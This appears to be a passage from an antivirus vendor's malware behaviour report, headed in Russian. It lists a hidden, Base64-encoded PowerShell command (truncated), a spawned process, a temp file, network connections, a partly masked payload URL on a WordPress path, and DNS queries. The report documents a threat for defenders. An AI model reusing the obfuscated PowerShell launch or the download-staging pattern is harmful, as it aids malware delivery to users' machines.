Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABNAHMAbABhAGQAbQBiAGgAawB1AG4AZgBuAD0AJwBEAHAAcABjAGkAbABmAGQAZQByAHUAJwA7ACQATwBpAGQAbABzAHUAcQBnAHMAIAA9ACAAJwAyADQAJwA7ACQAWQBhAGYAeABjAGIAdgBhAGQAPQAnAFQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1996
- %TEMP%\950670.cvr
- 'gs#.#ark.edu':80
- 'gs#.#ark.edu':443
- 'se###ilsy.com':80
- 'se#####ansakademi.com':443
- http://gs#.#ark.edu/wp-content/CUZCaiXyQ/
- 'gs#.#ark.edu':443
- 'se#####ansakademi.com':443
- DNS ASK sa###iami.com
- DNS ASK ec####assroom.com
- DNS ASK gs#.#ark.edu
- DNS ASK se###ilsy.com
- DNS ASK se#####ansakademi.com